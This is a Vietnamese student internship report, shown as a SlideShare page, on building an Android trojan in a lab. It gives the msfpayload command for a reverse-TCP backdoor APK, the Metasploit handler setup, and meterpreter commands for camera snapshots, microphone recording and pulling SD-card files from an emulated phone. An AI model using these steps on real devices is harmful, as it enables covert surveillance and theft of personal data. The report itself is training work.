SlideShare a Scribd company logo
1 of 15
TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG & AN NINH MẠNG 
QUỐC TẾ 
ĐỀ TÀI : 
NGHIÊN CỨU CÁC TROJAN, MALWARE 
CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH 
SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN 
THOẠI SỬ DỤNG ANDROID VÀ GỬI RA 
NGOÀI 
BÁO CÁO TUẦN 3 
GVHD: VÕ ĐỖ THẮNG 
SVTH: TRẦN THANH THÔNG 
MSSV: 1120168
BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp 
dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi 
ra ngoài 
PHẦN 1: THỰC HIỆN TRÊN MẠNG LAN 
1.1. Nghiên cứu và cài đặt Kali Linux trên VMware 
1.2. Tạo mã độc trên Kali Linux xâm nhập Android 
1.2.1. Tạo mã độc trên Kali Linux 
Ta sử dụng Metasploit framework trên Kali Linux để tạo một payload, khi 
máy android tải về và mở payload lên thì sẽ bị xâm nhập và điều khiển. Nếu sử 
dụng máy ảo Kali Linux bằng Vmware, ta nên thiết lập phần Network như sau: 
Bấm vào VM  Settings... ở thanh lựa chọn của Vmware 
Bấm vào Network Adapter và chọn Bridged: connection directly to the 
Trang 1 
physical network
BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp 
dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi 
ra ngoài 
Bấm vào Edit => Virtual Network Editor... 
Trên phần Bridge (connect VMs directly to the external network) chọn 
Trang 2 
adapter của máy thật
BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp 
dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi 
ra ngoài 
Sau đây ta vào phần chính tạo backdoor và xâm nhập điều khiển android 
Đầu tiên mở Terminal và gõ dòng lệnh 
Msfpayload android/meterpreter/reverse_tcp lhost=192.168.126.130 
lport=8080 R > /root/Desktop/hack.apk 
Trang 3
BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp 
dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi 
ra ngoài 
192.168.126.130 là địa chỉ IP của máy Kali, ta có thể sử dụng lệnh ifconfig 
Trang 4 
để xem IP của máy Kali 
8080 là số port, có thể chọn port khác, không nên chọn các port thường sử 
dụng
BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp 
dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi 
ra ngoài 
Lệnh trên sẽ tạo ra 1 file hack.apk trên desktop của Kali, đây chính là một 
Trang 5 
Metasploit reverse tcp backdoor. 
Tiếp theo, gõ lệnh msfconsole 
Sau khi msfconsole load xong, ta tạo một handler để xử lí dữ liệu truyền về 
bằng cách gõ lệnh sau:
BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp 
dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi 
ra ngoài 
Trang 6 
use exploit/multi/handler 
set payload android/meterpreter/reverse_tcp 
set lhost 192.168.126.130 – nhập địa chỉ IP giống với khi tạo payload ở trên. 
set lport 8080 – nhập port giống với port khi tạo payload ở trên. 
Exploit 
Màn hình sẽ như sau, lúc này ta đang chờ một máy android mở backdoor. 
Thử với một máy Samsung Galaxy S3 giả lập, tải về hack.apk, cài đặt và 
mở lên được giao diện như dưới, nhấp vào nút reverse_tcp
BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp 
dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi 
ra ngoài 
Vậy là ta đã kết nối thành công tới máy Android này, ở msfconsole sẽ như 
Trang 7 
sau:
BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp 
dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi 
ra ngoài 
Để xem thông tin về máy, nhập lệnh SysInfo 
1.2.2. Thực hiện khai thác dữ liệu trong SDcard 
Trang 8 
a. Sử dụng camera 
Để xem danh sách camera, nhập webcam_list
BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp 
dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi 
ra ngoài 
Để chụp hình bằng camera, nhập webcam_snap x với x là ID của camera 
xem ở danh sách camera ở phần trước. Ví dụ như sau: 
File hình đã chụp từ camera của máy android là GBgAyecQ.jpg được lưu ở 
Trang 9 
/root của máy 
b. Ghi âm
BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp 
dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi 
ra ngoài 
Để thực hiện ghi âm, nhập lênh record_mic và file ghi âm sẽ được lưu về 
Trang 10 
máy 
c. Lấy file từ SDcard 
Để vào SDcard, nhập lệnh cd /sdcard và lệnh ls để xem danh sách file, thư 
mục
BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp 
dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi 
ra ngoài 
Ví dụ ở đây, ta tải file hack-1.apk trong thư mục download của SDcard 
Trang 11
BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp 
dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi 
ra ngoài 
Dùng lệnh cd /sdcard/Download để vào thư mục 
Trang 12
BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp 
dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi 
ra ngoài 
Như trên hình, ta thấy 2 file là hack-1.apk và hack.apk, để tải hack-1.apk 
Trang 13 
về máy, ta nhập lệnh 
Download hack-1.apk 
Và file này sẽ được tải về thư mục root của máy Kali
BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp 
dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi 
ra ngoài 
Trang 14

More Related Content

What's hot

Cài đặt trojan cho android
Cài đặt trojan cho androidCài đặt trojan cho android
Cài đặt trojan cho androidthach28
 
Nghiên cứu các chương trình có mã độc trên android và nghiên cứu cài đặt bac...
Nghiên cứu các chương trình có mã độc trên android  và nghiên cứu cài đặt bac...Nghiên cứu các chương trình có mã độc trên android  và nghiên cứu cài đặt bac...
Nghiên cứu các chương trình có mã độc trên android và nghiên cứu cài đặt bac...Nguyen Anh
 
Cách tạo mã độc trên kali linux và triển khai trên android ảo
Cách tạo mã độc trên kali linux và triển khai trên android ảoCách tạo mã độc trên kali linux và triển khai trên android ảo
Cách tạo mã độc trên kali linux và triển khai trên android ảothach28
 
Tạo mã độc trên vps để xâm nhập android - Nguyen Xuan Ngoc
Tạo mã độc trên vps để xâm nhập android - Nguyen Xuan NgocTạo mã độc trên vps để xâm nhập android - Nguyen Xuan Ngoc
Tạo mã độc trên vps để xâm nhập android - Nguyen Xuan NgocXuân Ngọc Nguyễn
 
Hack android dùng metasploit cài trên VPS
Hack android dùng metasploit cài trên VPSHack android dùng metasploit cài trên VPS
Hack android dùng metasploit cài trên VPSLê Lãnh
 
Vũ Thanh Hiếu tạo mã độc trên kali linux để xâm nhập android
Vũ Thanh Hiếu   tạo mã độc trên kali linux để xâm nhập androidVũ Thanh Hiếu   tạo mã độc trên kali linux để xâm nhập android
Vũ Thanh Hiếu tạo mã độc trên kali linux để xâm nhập androidAnh Hiếu
 
Xâm nhập điện thoại android qua vps trên internet
Xâm nhập điện thoại android qua vps trên internetXâm nhập điện thoại android qua vps trên internet
Xâm nhập điện thoại android qua vps trên internetthach28
 
Tạo mã độc trên kali linux để xâm nhập android (mạng lan )
Tạo mã độc trên kali linux để xâm nhập android (mạng lan )Tạo mã độc trên kali linux để xâm nhập android (mạng lan )
Tạo mã độc trên kali linux để xâm nhập android (mạng lan )Trọng An
 
Tạo mã độc trên vps để xâm nhập android ( môi trường internet )
Tạo mã độc trên vps để xâm nhập android ( môi trường internet  )Tạo mã độc trên vps để xâm nhập android ( môi trường internet  )
Tạo mã độc trên vps để xâm nhập android ( môi trường internet )Trọng An
 
Tuần 3 tạo mã độc trên kali linux
Tuần 3   tạo mã độc trên kali linuxTuần 3   tạo mã độc trên kali linux
Tuần 3 tạo mã độc trên kali linuxHường Tô
 
Huong dan phat_hien_thu_gia_mao_v4
Huong dan phat_hien_thu_gia_mao_v4Huong dan phat_hien_thu_gia_mao_v4
Huong dan phat_hien_thu_gia_mao_v4Phi Phi
 

What's hot (15)

Cài đặt trojan cho android
Cài đặt trojan cho androidCài đặt trojan cho android
Cài đặt trojan cho android
 
Nghiên cứu các chương trình có mã độc trên android và nghiên cứu cài đặt bac...
Nghiên cứu các chương trình có mã độc trên android  và nghiên cứu cài đặt bac...Nghiên cứu các chương trình có mã độc trên android  và nghiên cứu cài đặt bac...
Nghiên cứu các chương trình có mã độc trên android và nghiên cứu cài đặt bac...
 
Cách tạo mã độc trên kali linux và triển khai trên android ảo
Cách tạo mã độc trên kali linux và triển khai trên android ảoCách tạo mã độc trên kali linux và triển khai trên android ảo
Cách tạo mã độc trên kali linux và triển khai trên android ảo
 
Tạo mã độc trên vps để xâm nhập android - Nguyen Xuan Ngoc
Tạo mã độc trên vps để xâm nhập android - Nguyen Xuan NgocTạo mã độc trên vps để xâm nhập android - Nguyen Xuan Ngoc
Tạo mã độc trên vps để xâm nhập android - Nguyen Xuan Ngoc
 
Hack android dùng metasploit cài trên VPS
Hack android dùng metasploit cài trên VPSHack android dùng metasploit cài trên VPS
Hack android dùng metasploit cài trên VPS
 
Vũ Thanh Hiếu tạo mã độc trên kali linux để xâm nhập android
Vũ Thanh Hiếu   tạo mã độc trên kali linux để xâm nhập androidVũ Thanh Hiếu   tạo mã độc trên kali linux để xâm nhập android
Vũ Thanh Hiếu tạo mã độc trên kali linux để xâm nhập android
 
Xâm nhập điện thoại android qua vps trên internet
Xâm nhập điện thoại android qua vps trên internetXâm nhập điện thoại android qua vps trên internet
Xâm nhập điện thoại android qua vps trên internet
 
Tạo mã độc trên kali linux để xâm nhập android (mạng lan )
Tạo mã độc trên kali linux để xâm nhập android (mạng lan )Tạo mã độc trên kali linux để xâm nhập android (mạng lan )
Tạo mã độc trên kali linux để xâm nhập android (mạng lan )
 
Tuan2
Tuan2Tuan2
Tuan2
 
Tạo mã độc trên vps để xâm nhập android ( môi trường internet )
Tạo mã độc trên vps để xâm nhập android ( môi trường internet  )Tạo mã độc trên vps để xâm nhập android ( môi trường internet  )
Tạo mã độc trên vps để xâm nhập android ( môi trường internet )
 
Tuần 3 tạo mã độc trên kali linux
Tuần 3   tạo mã độc trên kali linuxTuần 3   tạo mã độc trên kali linux
Tuần 3 tạo mã độc trên kali linux
 
Huong dan phat_hien_thu_gia_mao_v4
Huong dan phat_hien_thu_gia_mao_v4Huong dan phat_hien_thu_gia_mao_v4
Huong dan phat_hien_thu_gia_mao_v4
 
Bao cao tuan 6 7 8
Bao cao tuan 6 7 8Bao cao tuan 6 7 8
Bao cao tuan 6 7 8
 
Kali linux
Kali linuxKali linux
Kali linux
 
1
11
1
 

Viewers also liked

фандрейзинг Берегиня
фандрейзинг Берегиняфандрейзинг Берегиня
фандрейзинг БерегиняNadin Rakitina
 
Classic prestige
Classic prestigeClassic prestige
Classic prestigeStarAlex
 
Jak Spencer Design Researcher
Jak Spencer Design ResearcherJak Spencer Design Researcher
Jak Spencer Design ResearcherJak Spencer
 
Drupal node access system & AUL 7.x.-2.x
Drupal node access system & AUL 7.x.-2.xDrupal node access system & AUL 7.x.-2.x
Drupal node access system & AUL 7.x.-2.xOleksandr Milkovskyi
 
Why you should create Subscription Types in HubSpot
Why you should create Subscription Types in HubSpotWhy you should create Subscription Types in HubSpot
Why you should create Subscription Types in HubSpotHubSpot Customer Education
 
борьба сакских властей
борьба сакских властейборьба сакских властей
борьба сакских властейNadin Rakitina
 
Connect
ConnectConnect
Connect155714
 
ראש אחר - לילך וסרמן
ראש אחר - לילך וסרמןראש אחר - לילך וסרמן
ראש אחר - לילך וסרמןhila_el
 
To a sad daughter
To a sad daughterTo a sad daughter
To a sad daughternavi berdin
 
Архитектура Drupal Commerce. Основы работы с Drupal Commerce
Архитектура Drupal Commerce. Основы работы с Drupal CommerceАрхитектура Drupal Commerce. Основы работы с Drupal Commerce
Архитектура Drupal Commerce. Основы работы с Drupal CommerceOleksandr Milkovskyi
 
ראש אחר מאמרה של לילך וסרמן
ראש אחר מאמרה של לילך וסרמןראש אחר מאמרה של לילך וסרמן
ראש אחר מאמרה של לילך וסרמןhila_el
 
Breakthrough to Your Hidden Potential
Breakthrough to Your Hidden PotentialBreakthrough to Your Hidden Potential
Breakthrough to Your Hidden PotentialPeter Comrie
 

Viewers also liked (20)

фандрейзинг Берегиня
фандрейзинг Берегиняфандрейзинг Берегиня
фандрейзинг Берегиня
 
Classic prestige
Classic prestigeClassic prestige
Classic prestige
 
Lab 1 word_gomez
Lab 1 word_gomezLab 1 word_gomez
Lab 1 word_gomez
 
Jak Spencer Design Researcher
Jak Spencer Design ResearcherJak Spencer Design Researcher
Jak Spencer Design Researcher
 
Drupal node access system & AUL 7.x.-2.x
Drupal node access system & AUL 7.x.-2.xDrupal node access system & AUL 7.x.-2.x
Drupal node access system & AUL 7.x.-2.x
 
Steve jobs
Steve jobsSteve jobs
Steve jobs
 
Why you should create Subscription Types in HubSpot
Why you should create Subscription Types in HubSpotWhy you should create Subscription Types in HubSpot
Why you should create Subscription Types in HubSpot
 
Accurate Drupal Admin Backend
Accurate Drupal Admin BackendAccurate Drupal Admin Backend
Accurate Drupal Admin Backend
 
Athena tuần 5
Athena tuần 5Athena tuần 5
Athena tuần 5
 
борьба сакских властей
борьба сакских властейборьба сакских властей
борьба сакских властей
 
Valores
ValoresValores
Valores
 
Connect
ConnectConnect
Connect
 
ראש אחר - לילך וסרמן
ראש אחר - לילך וסרמןראש אחר - לילך וסרמן
ראש אחר - לילך וסרמן
 
To a sad daughter
To a sad daughterTo a sad daughter
To a sad daughter
 
Drupal backend and admin
Drupal backend and adminDrupal backend and admin
Drupal backend and admin
 
Архитектура Drupal Commerce. Основы работы с Drupal Commerce
Архитектура Drupal Commerce. Основы работы с Drupal CommerceАрхитектура Drupal Commerce. Основы работы с Drupal Commerce
Архитектура Drupal Commerce. Основы работы с Drupal Commerce
 
ראש אחר מאמרה של לילך וסרמן
ראש אחר מאמרה של לילך וסרמןראש אחר מאמרה של לילך וסרמן
ראש אחר מאמרה של לילך וסרמן
 
ERPAL - ERP with Drupal
ERPAL - ERP with DrupalERPAL - ERP with Drupal
ERPAL - ERP with Drupal
 
Canvas
CanvasCanvas
Canvas
 
Breakthrough to Your Hidden Potential
Breakthrough to Your Hidden PotentialBreakthrough to Your Hidden Potential
Breakthrough to Your Hidden Potential
 

Similar to Athena tuần 3

Bao cao athena 1
Bao cao athena 1Bao cao athena 1
Bao cao athena 1NhoxPO
 
Cài đặt Genmymotion
 Cài đặt Genmymotion Cài đặt Genmymotion
Cài đặt GenmymotionTrọng An
 
BÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲ
BÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲBÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲ
BÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲphanconghien
 
Bài 9-An toàn trên không gian mạng-12042024
Bài 9-An toàn trên không gian mạng-12042024Bài 9-An toàn trên không gian mạng-12042024
Bài 9-An toàn trên không gian mạng-12042024markha82
 
Bc attt t01_th03
Bc attt t01_th03Bc attt t01_th03
Bc attt t01_th03tronghai9
 
Báo cáo thực tập - Đàm Văn Sáng
Báo cáo thực tập  - Đàm Văn SángBáo cáo thực tập  - Đàm Văn Sáng
Báo cáo thực tập - Đàm Văn SángĐàm Văn Sáng
 
BÁO CÁO THỰC TẬP - TUẦN 5
BÁO CÁO THỰC TẬP - TUẦN 5BÁO CÁO THỰC TẬP - TUẦN 5
BÁO CÁO THỰC TẬP - TUẦN 5kakawpah0911
 
BÁO CÁO THỰC TẬP ATHENA - TUẦN 5
BÁO CÁO THỰC TẬP ATHENA - TUẦN 5BÁO CÁO THỰC TẬP ATHENA - TUẦN 5
BÁO CÁO THỰC TẬP ATHENA - TUẦN 5phanconghien
 
Slide báo cáo cuối kì system hacking-Trần Nguyễn Lộc
Slide báo cáo cuối kì system hacking-Trần Nguyễn LộcSlide báo cáo cuối kì system hacking-Trần Nguyễn Lộc
Slide báo cáo cuối kì system hacking-Trần Nguyễn LộcLoc Tran
 
BÁO CÁO THỰC TẬP ATHENA - TUẦN 1
BÁO CÁO THỰC TẬP ATHENA - TUẦN 1BÁO CÁO THỰC TẬP ATHENA - TUẦN 1
BÁO CÁO THỰC TẬP ATHENA - TUẦN 1phanconghien
 
BÁO CÁO THỰC TẬP - GIỮA KỲ
BÁO CÁO THỰC TẬP - GIỮA KỲBÁO CÁO THỰC TẬP - GIỮA KỲ
BÁO CÁO THỰC TẬP - GIỮA KỲkakawpah0911
 

Similar to Athena tuần 3 (20)

Genmymotion
GenmymotionGenmymotion
Genmymotion
 
Tuan 2
Tuan 2Tuan 2
Tuan 2
 
Bao cao athena 1
Bao cao athena 1Bao cao athena 1
Bao cao athena 1
 
Genmymotion
GenmymotionGenmymotion
Genmymotion
 
Cài đặt Genmymotion
 Cài đặt Genmymotion Cài đặt Genmymotion
Cài đặt Genmymotion
 
Bai bao cao 2
Bai bao cao 2Bai bao cao 2
Bai bao cao 2
 
Bai bao cao 2
Bai bao cao 2Bai bao cao 2
Bai bao cao 2
 
BÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲ
BÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲBÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲ
BÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲ
 
Bài 9-An toàn trên không gian mạng-12042024
Bài 9-An toàn trên không gian mạng-12042024Bài 9-An toàn trên không gian mạng-12042024
Bài 9-An toàn trên không gian mạng-12042024
 
Bc attt t01_th03
Bc attt t01_th03Bc attt t01_th03
Bc attt t01_th03
 
Báo cáo thực tập - Đàm Văn Sáng
Báo cáo thực tập  - Đàm Văn SángBáo cáo thực tập  - Đàm Văn Sáng
Báo cáo thực tập - Đàm Văn Sáng
 
ATHENA - Nguyen Xuan Ngoc - Giua Ky
ATHENA - Nguyen Xuan Ngoc - Giua KyATHENA - Nguyen Xuan Ngoc - Giua Ky
ATHENA - Nguyen Xuan Ngoc - Giua Ky
 
BÁO CÁO THỰC TẬP - TUẦN 5
BÁO CÁO THỰC TẬP - TUẦN 5BÁO CÁO THỰC TẬP - TUẦN 5
BÁO CÁO THỰC TẬP - TUẦN 5
 
BÁO CÁO THỰC TẬP ATHENA - TUẦN 5
BÁO CÁO THỰC TẬP ATHENA - TUẦN 5BÁO CÁO THỰC TẬP ATHENA - TUẦN 5
BÁO CÁO THỰC TẬP ATHENA - TUẦN 5
 
Bao cao tuan 2
Bao cao tuan 2Bao cao tuan 2
Bao cao tuan 2
 
Slide báo cáo cuối kì system hacking-Trần Nguyễn Lộc
Slide báo cáo cuối kì system hacking-Trần Nguyễn LộcSlide báo cáo cuối kì system hacking-Trần Nguyễn Lộc
Slide báo cáo cuối kì system hacking-Trần Nguyễn Lộc
 
Bao cao
Bao caoBao cao
Bao cao
 
BÁO CÁO THỰC TẬP ATHENA - TUẦN 1
BÁO CÁO THỰC TẬP ATHENA - TUẦN 1BÁO CÁO THỰC TẬP ATHENA - TUẦN 1
BÁO CÁO THỰC TẬP ATHENA - TUẦN 1
 
BÁO CÁO THỰC TẬP - GIỮA KỲ
BÁO CÁO THỰC TẬP - GIỮA KỲBÁO CÁO THỰC TẬP - GIỮA KỲ
BÁO CÁO THỰC TẬP - GIỮA KỲ
 
Apt oct-2014
Apt oct-2014Apt oct-2014
Apt oct-2014
 

Athena tuần 3

  • 1. TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG & AN NINH MẠNG QUỐC TẾ ĐỀ TÀI : NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI BÁO CÁO TUẦN 3 GVHD: VÕ ĐỖ THẮNG SVTH: TRẦN THANH THÔNG MSSV: 1120168
  • 2. BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài PHẦN 1: THỰC HIỆN TRÊN MẠNG LAN 1.1. Nghiên cứu và cài đặt Kali Linux trên VMware 1.2. Tạo mã độc trên Kali Linux xâm nhập Android 1.2.1. Tạo mã độc trên Kali Linux Ta sử dụng Metasploit framework trên Kali Linux để tạo một payload, khi máy android tải về và mở payload lên thì sẽ bị xâm nhập và điều khiển. Nếu sử dụng máy ảo Kali Linux bằng Vmware, ta nên thiết lập phần Network như sau: Bấm vào VM  Settings... ở thanh lựa chọn của Vmware Bấm vào Network Adapter và chọn Bridged: connection directly to the Trang 1 physical network
  • 3. BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài Bấm vào Edit => Virtual Network Editor... Trên phần Bridge (connect VMs directly to the external network) chọn Trang 2 adapter của máy thật
  • 4. BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài Sau đây ta vào phần chính tạo backdoor và xâm nhập điều khiển android Đầu tiên mở Terminal và gõ dòng lệnh Msfpayload android/meterpreter/reverse_tcp lhost=192.168.126.130 lport=8080 R > /root/Desktop/hack.apk Trang 3
  • 5. BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài 192.168.126.130 là địa chỉ IP của máy Kali, ta có thể sử dụng lệnh ifconfig Trang 4 để xem IP của máy Kali 8080 là số port, có thể chọn port khác, không nên chọn các port thường sử dụng
  • 6. BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài Lệnh trên sẽ tạo ra 1 file hack.apk trên desktop của Kali, đây chính là một Trang 5 Metasploit reverse tcp backdoor. Tiếp theo, gõ lệnh msfconsole Sau khi msfconsole load xong, ta tạo một handler để xử lí dữ liệu truyền về bằng cách gõ lệnh sau:
  • 7. BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài Trang 6 use exploit/multi/handler set payload android/meterpreter/reverse_tcp set lhost 192.168.126.130 – nhập địa chỉ IP giống với khi tạo payload ở trên. set lport 8080 – nhập port giống với port khi tạo payload ở trên. Exploit Màn hình sẽ như sau, lúc này ta đang chờ một máy android mở backdoor. Thử với một máy Samsung Galaxy S3 giả lập, tải về hack.apk, cài đặt và mở lên được giao diện như dưới, nhấp vào nút reverse_tcp
  • 8. BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài Vậy là ta đã kết nối thành công tới máy Android này, ở msfconsole sẽ như Trang 7 sau:
  • 9. BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài Để xem thông tin về máy, nhập lệnh SysInfo 1.2.2. Thực hiện khai thác dữ liệu trong SDcard Trang 8 a. Sử dụng camera Để xem danh sách camera, nhập webcam_list
  • 10. BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài Để chụp hình bằng camera, nhập webcam_snap x với x là ID của camera xem ở danh sách camera ở phần trước. Ví dụ như sau: File hình đã chụp từ camera của máy android là GBgAyecQ.jpg được lưu ở Trang 9 /root của máy b. Ghi âm
  • 11. BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài Để thực hiện ghi âm, nhập lênh record_mic và file ghi âm sẽ được lưu về Trang 10 máy c. Lấy file từ SDcard Để vào SDcard, nhập lệnh cd /sdcard và lệnh ls để xem danh sách file, thư mục
  • 12. BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài Ví dụ ở đây, ta tải file hack-1.apk trong thư mục download của SDcard Trang 11
  • 13. BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài Dùng lệnh cd /sdcard/Download để vào thư mục Trang 12
  • 14. BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài Như trên hình, ta thấy 2 file là hack-1.apk và hack.apk, để tải hack-1.apk Trang 13 về máy, ta nhập lệnh Download hack-1.apk Và file này sẽ được tải về thư mục root của máy Kali
  • 15. BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài Trang 14